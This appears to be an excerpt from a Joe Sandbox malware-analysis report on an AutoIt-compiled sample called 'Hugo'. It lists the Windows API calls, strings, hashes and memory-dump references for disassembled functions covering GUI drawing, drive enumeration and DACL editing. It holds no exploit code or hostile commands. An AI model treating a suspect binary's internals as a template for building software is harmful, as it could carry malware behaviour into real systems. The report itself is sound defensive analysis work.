                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                              • API String ID: 2211948467-2373415609
                                                                                                                                                                                                              • Opcode ID: aab71c5600c8ca05c9f175c5c34d60fac556d3d619fb432c5fd46eaef887f68e
                                                                                                                                                                                                              • Instruction ID: eff5f8cf8feae32721f2ceda13514b2f23ef80466f24e0e65afb1fadd866ee64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab71c5600c8ca05c9f175c5c34d60fac556d3d619fb432c5fd46eaef887f68e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09025FB1900209AFDB14DF64CD89EAE7BB9EF49310F048158F9169B2A0DB74ED41EF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00FA7B67
                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00FA7B98
                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00FA7BA4
                                                                                                                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00FA7BBE
                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00FA7BCD
                                                                                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00FA7BF8
                                                                                                                                                                                                              • GetSysColor.USER32(00000010), ref: 00FA7C00
                                                                                                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00FA7C07
                                                                                                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 00FA7C16
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00FA7C1D
                                                                                                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00FA7C68
                                                                                                                                                                                                              • FillRect.USER32(?,?,?), ref: 00FA7C9A
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA7CBC
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: GetSysColor.USER32(00000012), ref: 00FA7E5B
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: SetTextColor.GDI32(?,00FA7B2D), ref: 00FA7E5F
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: GetSysColorBrush.USER32(0000000F), ref: 00FA7E75
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: GetSysColor.USER32(0000000F), ref: 00FA7E80
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: GetSysColor.USER32(00000011), ref: 00FA7E9D
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FA7EAB
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: SelectObject.GDI32(?,00000000), ref: 00FA7EBC
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: SetBkColor.GDI32(?,?), ref: 00FA7EC5
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: SelectObject.GDI32(?,?), ref: 00FA7ED2
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00FA7EF1
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FA7F08
                                                                                                                                                                                                                • Part of subcall function 00FA7E22: GetWindowLongW.USER32(?,000000F0), ref: 00FA7F15
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4124339563-0
                                                                                                                                                                                                              • Opcode ID: 37fcca05d9cd95f70bb0b9094097344ae1b9ca20ded4720b1d99e66361b0f721
                                                                                                                                                                                                              • Instruction ID: 57c246fb497c571d9d807a0f9030463821f084e0947885eadaa9e8663ff4c592
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37fcca05d9cd95f70bb0b9094097344ae1b9ca20ded4720b1d99e66361b0f721
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEA1B2B2408305BFDB10AF64DC48E6BBBA9FF8A330F140A19F962965E0D771D944EB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(?,?), ref: 00F116B4
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F52B07
                                                                                                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F52B40
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F52F85
                                                                                                                                                                                                                • Part of subcall function 00F11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F11488,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F11865
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053), ref: 00F52FC1
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F52FD8
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F52FEE
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F52FF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 2760611726-4108050209
                                                                                                                                                                                                              • Opcode ID: db280fe36b647a038cc6d3058c486cdcd643e28aa2f802266299db350913d09a
                                                                                                                                                                                                              • Instruction ID: 905ce3e0909e15a21c520513fee078250db3789707b6d49efbb675eba8b73abd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db280fe36b647a038cc6d3058c486cdcd643e28aa2f802266299db350913d09a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A12D230A002459FC765CF14C884BA9B7F5FB46322F184269FA55DB662C731EC8AFB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 00F9319B
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F932C7
                                                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F93306
                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F93316
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F9335D
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00F93369
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F933B2
                                                                                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F933C1
                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00F933D1
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00F933D5
                                                                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F933E5
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F933EE
                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00F933F7
                                                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F93423
                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F9343A
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F9347A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F9348E
                                                                                                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F9349F
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F934D4
                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00F934DF
                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F934EA
                                                                                                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F934F4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                                                              • Opcode ID: 7a26c6f161e6233bdb72ab59e00529d18eaacaf729aec698f835e3211b03d443
                                                                                                                                                                                                              • Instruction ID: 2a6287881bafaa0d043aee90f111ca30f4552697c02afb294e4643a9dfb8c94b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a26c6f161e6233bdb72ab59e00529d18eaacaf729aec698f835e3211b03d443
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEB14EB1A40219AFEB14DFA8DC89FAF7BB9EB49710F004115F915EB290D774AD40EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00F85532
                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,00FADC30,?,\\.\,00FADCD0), ref: 00F8560F
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00FADC30,?,\\.\,00FADCD0), ref: 00F8577B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                                                                                                              • Opcode ID: cac8005f95bd7827739fbdb168c308152bfb40597eb5e35f2caf303fb40c3b2e
                                                                                                                                                                                                              • Instruction ID: 299a58c69d1802b33d3b563bc457e8b000c2c2015afc7cf7cbd1a00b627f89af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cac8005f95bd7827739fbdb168c308152bfb40597eb5e35f2caf303fb40c3b2e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A61B331A04A09DBC724FF24CD91AFDB7A2AF54B64BA88056E406AF351E731DD41FB42
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00FA1BC4
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00FA1BD9
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00FA1BE0
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA1C35
                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00FA1C55
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FA1C89
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA1CA7
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA1CB9
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FA1CCE
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FA1CE1
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 00FA1D3D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FA1D58
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FA1D6C
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FA1D84
                                                                                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00FA1DAA
                                                                                                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00FA1DC4
                                                                                                                                                                                                              • CopyRect.USER32(?,?), ref: 00FA1DDB
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FA1E46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                                                                                                                              • API String ID: 698492251-4156429822
                                                                                                                                                                                                              • Opcode ID: 144705cd1d65885e0c3df31e4961f1a1a4dace5149dc363f98a9f97b4ed8e8c8
                                                                                                                                                                                                              • Instruction ID: ee96bf74d355cac7da193c1b137c5180559d75be832f5ad56384800963184c1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 144705cd1d65885e0c3df31e4961f1a1a4dace5149dc363f98a9f97b4ed8e8c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BB19FB1604301AFD714DF64C985B9BBBE5FF85360F00891CF99A9B291C731E844EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00FA0D81
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA0DBB
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA0E25
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA0E8D
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA0F11
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FA0F61
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FA0FA0
                                                                                                                                                                                                                • Part of subcall function 00F2FD52: _wcslen.LIBCMT ref: 00F2FD5D
                                                                                                                                                                                                                • Part of subcall function 00F72B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F72BA5
                                                                                                                                                                                                                • Part of subcall function 00F72B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F72BD7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                              • API String ID: 1103490817-719923060
                                                                                                                                                                                                              • Opcode ID: 9b4003f80f5c8ed2e1abc91218448fdb6854447f70d32363084cd142e4d8a5cc
                                                                                                                                                                                                              • Instruction ID: 6e1f9eb560cec0208eeac59734c4fed57e103ac7a2fa08d50e7ddee555e702bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b4003f80f5c8ed2e1abc91218448fdb6854447f70d32363084cd142e4d8a5cc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAE127726143018FC714DF24C85096AB3E6FF86364F04892DF896973A2DB34ED45EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F125F8
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00F12600
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F1262B
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00F12633
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00F12658
                                                                                                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F12675
                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F12685
                                                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F126B8
                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F126CC
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00F126EA
                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00F12706
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F12711
                                                                                                                                                                                                                • Part of subcall function 00F119CD: GetCursorPos.USER32(?), ref: 00F119E1
                                                                                                                                                                                                                • Part of subcall function 00F119CD: ScreenToClient.USER32(00000000,?), ref: 00F119FE
                                                                                                                                                                                                                • Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000001), ref: 00F11A23
                                                                                                                                                                                                                • Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000002), ref: 00F11A3D
                                                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00F1199C), ref: 00F12738
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                                                                                                                              • API String ID: 1458621304-248962490
                                                                                                                                                                                                              • Opcode ID: 87e5aaef05aa50e6b5ffb89c0a1baf32f0db344335c8abf50b04f55568917816
                                                                                                                                                                                                              • Instruction ID: 0302091621764e43c231f869160a44432f2ea2f4f27e240a117df84d70982c6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87e5aaef05aa50e6b5ffb89c0a1baf32f0db344335c8abf50b04f55568917816
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FB19EB1A002099FDB54DFA8CC85BEE7BB5FB48325F104129FA16AB290DB74D940EF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71A60
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A6C
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A7B
                                                                                                                                                                                                                • Part of subcall function 00F71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A82
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F71A99
                                                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F71741
                                                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F71775
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00F7178C
                                                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00F717C6
                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F717E2
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00F717F9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F71801
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00F71808
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F71829
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00F71830
                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F7185F
                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F71881
                                                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F71893
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F718BA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F718C1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F718CA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F718D1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F718DA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F718E1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00F718ED
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F718F4
                                                                                                                                                                                                                • Part of subcall function 00F71ADF: GetProcessHeap.KERNEL32(00000008,00F714FD,?,00000000,?,00F714FD,?), ref: 00F71AED
                                                                                                                                                                                                                • Part of subcall function 00F71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F714FD,?), ref: 00F71AF4
                                                                                                                                                                                                                • Part of subcall function 00F71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F714FD,?), ref: 00F71B03
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
